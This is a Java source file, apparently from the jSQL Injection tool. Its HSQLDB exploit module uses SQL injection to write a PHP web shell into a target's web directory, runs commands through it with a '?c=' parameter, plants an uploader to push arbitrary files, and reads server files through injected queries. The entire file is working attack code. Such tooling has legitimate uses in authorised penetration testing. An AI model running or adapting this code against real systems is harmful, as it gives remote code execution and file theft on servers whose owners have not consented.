1 package com.jsql.model.accessible.engine;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.CallableFile;
5 import com.jsql.model.accessible.DataAccess;
6 import com.jsql.model.accessible.ResourceAccess;
7 import com.jsql.model.accessible.engine.hsqldb.ModelYamlHsqldb;
8 import com.jsql.model.bean.database.MockElement;
9 import com.jsql.model.suspendable.Input;
10 import com.jsql.view.subscriber.Seal;
11 import com.jsql.model.exception.AbstractSlidingException;
12 import com.jsql.model.exception.JSqlException;
13 import com.jsql.model.exception.JSqlRuntimeException;
14 import com.jsql.model.injection.engine.model.EngineYaml;
15 import com.jsql.model.suspendable.SuspendableGetRows;
16 import com.jsql.util.LogLevelUtil;
17 import com.jsql.util.StringUtil;
18 import org.apache.commons.lang3.RandomStringUtils;
19 import org.apache.commons.lang3.StringUtils;
20 import org.apache.logging.log4j.LogManager;
21 import org.apache.logging.log4j.Logger;
22 import org.yaml.snakeyaml.Yaml;
23
24 import java.io.File;
25 import java.io.FileInputStream;
26 import java.io.IOException;
27 import java.io.InputStream;
28 import java.net.http.HttpResponse;
29 import java.util.function.BinaryOperator;
30
31 public class ExploitHsqldb {
32
33 private static final Logger LOGGER = LogManager.getRootLogger();
34 private final InjectionModel injectionModel;
35 private final ModelYamlHsqldb modelYaml;
36
37 public ExploitHsqldb(InjectionModel injectionModel) {
38 this.injectionModel = injectionModel;
39 var yaml = new Yaml();
40 this.modelYaml = yaml.loadAs(
41 injectionModel.getMediatorEngine().getHsqldb().instance().getModelYaml().getResource().getExploit(),
42 ModelYamlHsqldb.class
43 );
44 }
45
46 public String createWeb(String pathExploit, String urlExploit) {
47 LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
48
49 String bodyExploit = StringUtil.base64Decode(
50 this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
51 )
52 .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
53 .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
54
55 var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
56 var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
57 this.injectionModel.injectWithoutIndex(String.format(
58 this.modelYaml.getFile().getWrite(),
59 nameTable,
60 nameTable, bodyExploit.replace("'", "\""),
61 nameTable, pathExploit + nameExploit
62 ), ResourceAccess.TBL_CREATE);
63
64 BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
65 String result = this.injectionModel.getResourceAccess().callCommand(
66 urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
67 );
68 if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
69 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
70 return StringUtils.EMPTY;
71 }
72 this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
73 return urlSuccess;
74 };
75
76 return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
77 }
78
79 public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
80 String bodyExploit = StringUtil.base64Decode(
81 this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
82 )
83 .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
84 .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
85
86 var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
87 var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
88 this.injectionModel.injectWithoutIndex(String.format(
89 this.modelYaml.getFile().getWrite(),
90 nameTable,
91 nameTable, bodyExploit.replace("'", "\""),
92 nameTable, pathExploit + nameExploit
93 ), ResourceAccess.TBL_CREATE);
94
95 BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
96 try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
97 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
98 if (result.body().contains(DataAccess.LEAD +"y")) {
99 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
100 } else {
101 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
102 }
103 } catch (InterruptedException e) {
104 LOGGER.log(LogLevelUtil.IGNORE, e, e);
105 Thread.currentThread().interrupt();
106 } catch (IOException | JSqlException e) {
107 throw new JSqlRuntimeException(e);
108 }
109 return urlSuccess;
110 };
111
112 this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
113 }
114
115 public String getRead(String pathFile) throws AbstractSlidingException {
116 LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK);
117 var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
118 this.injectionModel.injectWithoutIndex(String.format(
119 this.injectionModel.getResourceAccess().getExploitHsqldb().getModelYaml().getFile().getRead().getCreateTable(),
120 nameTable,
121 nameTable, pathFile
122 ), ResourceAccess.TBL_FILL);
123 return new SuspendableGetRows(this.injectionModel).run(new Input(
124 String.format(
125 this.injectionModel.getResourceAccess().getExploitHsqldb().getModelYaml().getFile().getRead().getResult(),
126 EngineYaml.TRAIL_SQL,
127 nameTable
128 ),
129 new String[]{ StringUtils.EMPTY },
130 false,
131 1,
132 MockElement.MOCK,
133 ResourceAccess.TBL_READ
134 ));
135 }
136
137 public ModelYamlHsqldb getModelYaml() {
138 return this.modelYaml;
139 }
140 }